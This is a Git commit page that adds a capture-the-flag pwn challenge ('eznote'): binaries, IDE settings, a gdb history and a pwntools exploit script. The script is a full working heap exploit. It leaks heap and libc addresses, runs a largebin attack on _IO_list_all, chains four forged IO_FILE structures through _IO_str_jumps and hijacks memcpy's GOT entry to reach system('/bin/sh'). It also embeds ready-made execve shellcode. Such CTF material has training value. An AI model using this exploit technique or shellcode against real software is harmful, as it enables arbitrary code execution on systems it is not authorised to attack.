Skip to content
体验新版
项目
组织
正在加载...
登录
切换导航
打开侧边栏
_sky123_
attachment
提交
0d064da9
A
attachment
项目概览
_sky123_
/
attachment
通知
29
Star
3
Fork
0
代码
文件
提交
分支
Tags
贡献者
分支图
Diff
Issue
0
列表
看板
标记
里程碑
合并请求
0
DevOps
流水线
流水线任务
计划
Wiki
0
Wiki
分析
仓库
DevOps
项目成员
Pages
A
attachment
项目概览
项目概览
详情
发布
仓库
仓库
文件
提交
分支
标签
贡献者
分支图
比较
Issue
0
Issue
0
列表
看板
标记
里程碑
合并请求
0
合并请求
0
Pages
DevOps
DevOps
流水线
流水线任务
计划
分析
分析
仓库分析
DevOps
Wiki
0
Wiki
成员
成员
收起侧边栏
关闭侧边栏
动态
分支图
创建新Issue
流水线任务
提交
Issue看板
前往新版Gitcode,体验更适合开发者的 AI 搜索 >>
提交
0d064da9
编写于
8月 25, 2023
作者:
_sky123_
浏览文件
操作
浏览文件
下载
电子邮件补丁
差异文件
update
上级
b2dec691
变更
10
隐藏空白更改
内联
并排
Showing
10 changed file
with
344 addition
and
0 deletion
+344
-0
glibc_pwn/eznoted2b1405e/.gdb_history
glibc_pwn/eznoted2b1405e/.gdb_history
+119
-0
glibc_pwn/eznoted2b1405e/.idea/.gitignore
glibc_pwn/eznoted2b1405e/.idea/.gitignore
+3
-0
glibc_pwn/eznoted2b1405e/.idea/eznoted2b1405e.iml
glibc_pwn/eznoted2b1405e/.idea/eznoted2b1405e.iml
+8
-0
glibc_pwn/eznoted2b1405e/.idea/inspectionProfiles/profiles_settings.xml
...ted2b1405e/.idea/inspectionProfiles/profiles_settings.xml
+6
-0
glibc_pwn/eznoted2b1405e/.idea/misc.xml
glibc_pwn/eznoted2b1405e/.idea/misc.xml
+4
-0
glibc_pwn/eznoted2b1405e/.idea/modules.xml
glibc_pwn/eznoted2b1405e/.idea/modules.xml
+8
-0
glibc_pwn/eznoted2b1405e/eznote
glibc_pwn/eznoted2b1405e/eznote
+0
-0
glibc_pwn/eznoted2b1405e/eznote.py
glibc_pwn/eznoted2b1405e/eznote.py
+196
-0
glibc_pwn/eznoted2b1405e/ld-linux-x86-64.so.2
glibc_pwn/eznoted2b1405e/ld-linux-x86-64.so.2
+0
-0
glibc_pwn/eznoted2b1405e/libc.so.6
glibc_pwn/eznoted2b1405e/libc.so.6
+0
-0
未找到文件。
glibc_pwn/eznoted2b1405e/.gdb_history
0 → 100644
浏览文件 @
0d064da9
vmmap
q
vmmap
p/x 0x7f431ff2d000-0x7f431ff54000
p/x -0x7f431ff2d000+0x7f431ff54000
p _IO_str_jumps
p &_IO_str_jumps
p/x 0x7f4320148640-0x7f431ff54000
q
got
libc
telescope 0x7f0c4f0a7000
vmmap
telescope 0x7f0c4f299000
memcpyx/30i 0x7f0c4f2242c0
x/30i 0x7f0c4f2242c0
p memcpy
x/20i 0x7f0c4f1458c0
vmmap
p/x 0x219160+0x7f0c4f0a7000
telescope 0x7f0c4f2c0160
vmmap
p/x 0x7f0c4f0a7000+0x1F2160
telescope 0x7f0c4f299160
q
c
k
p _IO_list_all
fp 0x557d0419bb90
c
k
ni
p fp
ni
bins
ni
bins
ni
bins
telescope 0x557d0419cc40
ni
x/s 0x557d0419b010
telescope 0x557d0419b010
ni
bins
telescope 0x557d0419b010-0x10
q
c
c
n
bins
telescope 0x5569618e2c40-0x10
ni
telescope 0x5569618e1010
telescope 0x5569618e2c40-0x10
bins
ni
bins
p __free_hook
telescope 0x5569618e2c40-0x10
ni
telescope 0x5569618e2c40-0x10
bins
telescope 0x5569618e1010
heap
telescope 0x5569618e1010
x/20gx 0x5569618e1010
ni
c
ni
bins
niq
q
c
c
bins
ni
n
bins
n
ni
vmmap
p fp
p *fp
ni
c
n
k
n
bins
ni
ni
p old_buf
telescope 0x55ccca5b8790
ni
bins
ni
c
ni
n
bins
ni
ni
x/20i 0x7f2cf6e22cc0
telescope 0x55ccca5b9830
telescope 0x7f2cf6e9b150
NI
ni
telescope 0x7f2cf6e9b150
ni
p fp
p *fp
ni
ni
n
c
n
ni
q
glibc_pwn/eznoted2b1405e/.idea/.gitignore
0 → 100644
浏览文件 @
0d064da9
# 默认忽略的文件
/shelf/
/workspace.xml
glibc_pwn/eznoted2b1405e/.idea/eznoted2b1405e.iml
0 → 100644
浏览文件 @
0d064da9
<?xml version="1.0" encoding="UTF-8"?>
<module
type=
"PYTHON_MODULE"
version=
"4"
>
<component
name=
"NewModuleRootManager"
>
<content
url=
"file://$MODULE_DIR$"
/>
<orderEntry
type=
"jdk"
jdkName=
"Python 2.7"
jdkType=
"Python SDK"
/>
<orderEntry
type=
"sourceFolder"
forTests=
"false"
/>
</component>
</module>
\ No newline at end of file
glibc_pwn/eznoted2b1405e/.idea/inspectionProfiles/profiles_settings.xml
0 → 100644
浏览文件 @
0d064da9
<component
name=
"InspectionProjectProfileManager"
>
<settings>
<option
name=
"USE_PROJECT_PROFILE"
value=
"false"
/>
<version
value=
"1.0"
/>
</settings>
</component>
\ No newline at end of file
glibc_pwn/eznoted2b1405e/.idea/misc.xml
0 → 100644
浏览文件 @
0d064da9
<?xml version="1.0" encoding="UTF-8"?>
<project
version=
"4"
>
<component
name=
"ProjectRootManager"
version=
"2"
project-jdk-name=
"Python 2.7"
project-jdk-type=
"Python SDK"
/>
</project>
\ No newline at end of file
glibc_pwn/eznoted2b1405e/.idea/modules.xml
0 → 100644
浏览文件 @
0d064da9
<?xml version="1.0" encoding="UTF-8"?>
<project
version=
"4"
>
<component
name=
"ProjectModuleManager"
>
<modules>
<module
fileurl=
"file://$PROJECT_DIR$/.idea/eznoted2b1405e.iml"
filepath=
"$PROJECT_DIR$/.idea/eznoted2b1405e.iml"
/>
</modules>
</component>
</project>
\ No newline at end of file
glibc_pwn/eznoted2b1405e/eznote
0 → 100755
浏览文件 @
0d064da9
文件已添加
glibc_pwn/eznoted2b1405e/eznote.py
0 → 100755
浏览文件 @
0d064da9
# _*_ coding:utf-8 _*_
from
pwn
import
*
# context.log_level='debug'
p
=
process
(
"./eznote"
)
elf
=
ELF
(
"./eznote"
)
libc
=
ELF
(
"./libc.so.6"
)
def
dbg
():
gdb
.
attach
(
p
)
pause
()
# -----------------------------------------------------------------------------------------
s
=
lambda
data
:
p
.
send
(
str
(
data
))
sa
=
lambda
text
,
data
:
p
.
sendafter
(
text
,
str
(
data
))
sl
=
lambda
data
:
p
.
sendline
(
str
(
data
))
sla
=
lambda
text
,
data
:
p
.
sendlineafter
(
text
,
str
(
data
))
r
=
lambda
num
=
4096
:
p
.
recv
(
num
)
ru
=
lambda
text
:
p
.
recvuntil
(
text
)
uu32
=
lambda
:
u32
(
p
.
recvuntil
(
"
\xf7
"
)[
-
4
:].
ljust
(
4
,
"
\x00
"
))
uu64
=
lambda
:
u64
(
p
.
recvuntil
(
"
\x7f
"
)[
-
6
:].
ljust
(
8
,
"
\x00
"
))
lg
=
lambda
s
:
p
.
success
(
'%s -> 0x%x'
%
(
s
,
eval
(
s
)))
sh_x86_18
=
"
\x6a\x0b\x58\x53\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80
"
sh_x86_20
=
"
\x31\xc9\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80
"
sh_x64_21
=
"
\xf7\xe6\x50\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x48\x89\xe7\xb0\x3b\x0f\x05
"
# https://www.exploit-db.com/shellcodes
# -----------------------------------------------------------------------------------------
def
add
(
size
,
con
):
sla
(
"> "
,
1
)
sla
(
"Size: "
,
size
)
p
.
sendlineafter
(
"Content: "
,
con
)
def
edit
(
idx
,
con
):
sla
(
"> "
,
3
)
sla
(
"Idx: "
,
idx
)
p
.
sendlineafter
(
"Content: "
,
con
)
def
show
(
idx
):
sla
(
"> "
,
4
)
sla
(
"Idx: "
,
idx
)
def
dele
(
idx
):
sla
(
"> "
,
2
)
sla
(
"Idx: "
,
idx
)
add
(
0x438
,
'0'
*
0x438
)
# 0
add
(
0x408
,
'1'
*
0x408
)
# 1
add
(
0x448
,
'2'
*
0x448
)
# 2
add
(
0x418
,
'3'
*
0x418
)
# 3
add
(
0x418
,
'4'
*
0x418
)
# 4
add
(
0x408
,
'5'
*
0x408
)
# 5
add
(
0x408
,
'6'
*
0x408
)
# 6
add
(
0xca1
,
'a'
)
# 7
dele
(
0
)
dele
(
3
)
# 0123
add
(
0x438
,
'a'
*
0x438
)
# 0
add
(
0x408
,
'a'
*
0x400
)
# 3-1
dele
(
1
)
show
(
3
)
ru
(
'Note3:
\n
'
)
key
=
u64
(
p
.
recv
(
5
).
ljust
(
8
,
'
\x00
'
))
lg
(
'key'
)
heap_base
=
key
<<
12
lg
(
'heap_base'
)
add
(
0x448
,
'a'
*
0x448
)
# 1-2
dele
(
4
)
# 3and4
add
(
0x838
,
'a'
*
0x838
)
# 4-3and4
dele
(
2
)
show
(
1
)
libc_base
=
libc
.
address
=
uu64
()
-
0x219ce0
+
0x27000
log
.
info
(
"libc base: "
+
hex
(
libc_base
))
IO_list_all
=
libc
.
sym
[
'_IO_list_all'
]
IO_str_jumps
=
libc
.
address
+
0x1f4640
memcpy_got
=
libc
.
address
+
0x01F2160
# libc.got['memcpy']
memset
=
libc
.
sym
[
'memset'
]
system
=
libc
.
sym
[
'system'
]
lg
(
'IO_list_all'
)
#gdb.attach(p,"b *_IO_flush_all_lockp\nb *_IO_str_overflow")
#pause()
# -----------------------------------------------------------------
add
(
0x1000
,
'a'
*
0x1000
)
# 2
edit
(
1
,
p64
(
libc_base
+
0x21a0e0
+
0x27000
)
*
2
+
p64
(
0
)
+
p64
(
IO_list_all
-
0x20
))
dele
(
0
)
add
(
0x1000
,
'a'
*
0x1000
)
# 0
dele
(
0
)
add
(
0x438
,
'a'
*
0x438
)
# 0
# -----------------------------------------------------------------
new_size
=
0x408
copy_heap_addr
=
heap_base
+
0x10
next_chain
=
heap_base
+
0x2d00
-
0x10
old_blen
=
(
new_size
-
100
)
//
2
fake_IO_FILE
=
p64
(
0
)
*
2
fake_IO_FILE
+=
p64
(
0
)
# _IO_write_base = 0
fake_IO_FILE
+=
p64
(
0xffffffffffffffff
)
# _IO_write_ptr = 0xffffffffffffffff
fake_IO_FILE
+=
p64
(
0
)
fake_IO_FILE
+=
p64
(
copy_heap_addr
)
# _IO_buf_base
fake_IO_FILE
+=
p64
(
copy_heap_addr
+
old_blen
)
# _IO_buf_end
fake_IO_FILE
=
fake_IO_FILE
.
ljust
(
0x58
,
'
\x00
'
)
fake_IO_FILE
+=
p64
(
next_chain
)
# _chain
fake_IO_FILE
=
fake_IO_FILE
.
ljust
(
0x78
,
'
\x00
'
)
fake_IO_FILE
+=
p64
(
heap_base
)
# _lock = writable address
fake_IO_FILE
=
fake_IO_FILE
.
ljust
(
0xB0
,
'
\x00
'
)
fake_IO_FILE
+=
p64
(
0
)
# _mode = 0
fake_IO_FILE
=
fake_IO_FILE
.
ljust
(
0xC8
,
'
\x00
'
)
fake_IO_FILE
+=
p64
(
IO_str_jumps
)
# vtable
new_size
=
0x288
copy_heap_addr
=
heap_base
+
0x790
next_chain
=
heap_base
+
0x2dd0
-
0x10
old_blen
=
(
new_size
-
100
)
//
2
fake_IO_FILE2
=
p64
(
0
)
*
2
fake_IO_FILE2
+=
p64
(
0
)
# _IO_write_base = 0
fake_IO_FILE2
+=
p64
(
0xffffffffffffffff
)
# _IO_write_ptr = 0xffffffffffffffff
fake_IO_FILE2
+=
p64
(
0
)
fake_IO_FILE2
+=
p64
(
copy_heap_addr
)
# _IO_buf_base
fake_IO_FILE2
+=
p64
(
copy_heap_addr
+
old_blen
)
# _IO_buf_end
fake_IO_FILE2
=
fake_IO_FILE2
.
ljust
(
0x58
,
'
\x00
'
)
fake_IO_FILE2
+=
p64
(
next_chain
)
# _chain
fake_IO_FILE2
=
fake_IO_FILE2
.
ljust
(
0x78
,
'
\x00
'
)
fake_IO_FILE2
+=
p64
(
heap_base
)
# _lock = writable address
fake_IO_FILE2
=
fake_IO_FILE2
.
ljust
(
0xB0
,
'
\x00
'
)
fake_IO_FILE2
+=
p64
(
0
)
# _mode = 0
fake_IO_FILE2
=
fake_IO_FILE2
.
ljust
(
0xC8
,
'
\x00
'
)
fake_IO_FILE2
+=
p64
(
IO_str_jumps
)
# vtable
new_size
=
0x128
copy_heap_addr
=
heap_base
+
0x1830
next_chain
=
heap_base
+
0x2e90
old_blen
=
(
new_size
-
100
)
//
2
fake_IO_FILE3
=
p64
(
0
)
*
2
fake_IO_FILE3
+=
p64
(
0
)
# _IO_write_base = 0
fake_IO_FILE3
+=
p64
(
0xffffffffffffffff
)
# _IO_write_ptr = 0xffffffffffffffff
fake_IO_FILE3
+=
p64
(
0
)
fake_IO_FILE3
+=
p64
(
copy_heap_addr
)
# _IO_buf_base
fake_IO_FILE3
+=
p64
(
copy_heap_addr
+
old_blen
)
# _IO_buf_end
fake_IO_FILE3
=
fake_IO_FILE3
.
ljust
(
0x58
,
'
\x00
'
)
fake_IO_FILE3
+=
p64
(
next_chain
)
# _chain
fake_IO_FILE3
=
fake_IO_FILE3
.
ljust
(
0x78
,
'
\x00
'
)
fake_IO_FILE3
+=
p64
(
heap_base
)
# _lock = writable address
fake_IO_FILE3
=
fake_IO_FILE3
.
ljust
(
0xB0
,
'
\x00
'
)
fake_IO_FILE3
+=
p64
(
0
)
# _mode = 0
fake_IO_FILE3
=
fake_IO_FILE3
.
ljust
(
0xC8
,
'
\x00
'
)
fake_IO_FILE3
+=
p64
(
IO_str_jumps
)
# vtable
new_size
=
0x108
copy_heap_addr
=
libc_base
next_chain
=
0
old_blen
=
(
new_size
-
100
)
//
2
fake_IO_FILE4
=
p64
(
0
)
*
2
fake_IO_FILE4
+=
p64
(
0
)
# _IO_write_base = 0
fake_IO_FILE4
+=
p64
(
0xffffffffffffffff
)
# _IO_write_ptr = 0xffffffffffffffff
fake_IO_FILE4
+=
p64
(
0
)
fake_IO_FILE4
+=
p64
(
copy_heap_addr
)
# _IO_buf_base
fake_IO_FILE4
+=
p64
(
copy_heap_addr
+
old_blen
)
# _IO_buf_end
fake_IO_FILE4
=
fake_IO_FILE4
.
ljust
(
0x58
,
'
\x00
'
)
fake_IO_FILE4
+=
p64
(
next_chain
)
# _chain
fake_IO_FILE4
=
fake_IO_FILE4
.
ljust
(
0x78
,
'
\x00
'
)
fake_IO_FILE4
+=
p64
(
heap_base
)
# _lock = writable address
fake_IO_FILE4
=
fake_IO_FILE4
.
ljust
(
0xB0
,
'
\x00
'
)
fake_IO_FILE4
+=
p64
(
0
)
# _mode = 0
fake_IO_FILE4
=
fake_IO_FILE4
.
ljust
(
0xC8
,
'
\x00
'
)
fake_IO_FILE4
+=
p64
(
IO_str_jumps
)
# vtable
edit
(
3
,
p16
(
1
)
*
0x20
+
p64
(
memcpy_got
-
0x10
)
*
0x30
)
# 0x780 # tcache struct data 0x40/0xd0
edit
(
1
,
fake_IO_FILE
)
# 0xb90 largebin
edit
(
2
,
fake_IO_FILE2
+
fake_IO_FILE3
+
fake_IO_FILE4
)
# 0x1000
edit
(
5
,
'/bin/sh
\x00
'
*
2
+
p64
(
system
)
+
'
\x00
'
*
0x20
+
p64
(
memset
))
# 410
dele
(
6
)
# 0xc40
sla
(
"> "
,
5
)
p
.
interactive
()
glibc_pwn/eznoted2b1405e/ld-linux-x86-64.so.2
0 → 100755
浏览文件 @
0d064da9
文件已添加
glibc_pwn/eznoted2b1405e/libc.so.6
0 → 100755
浏览文件 @
0d064da9
文件已添加
编辑
预览
Markdown
is supported
0%
请重试
或
添加新附件
.
添加附件
取消
You are about to add
0
people
to the discussion. Proceed with caution.
先完成此消息的编辑!
取消
想要评论请
注册
或
登录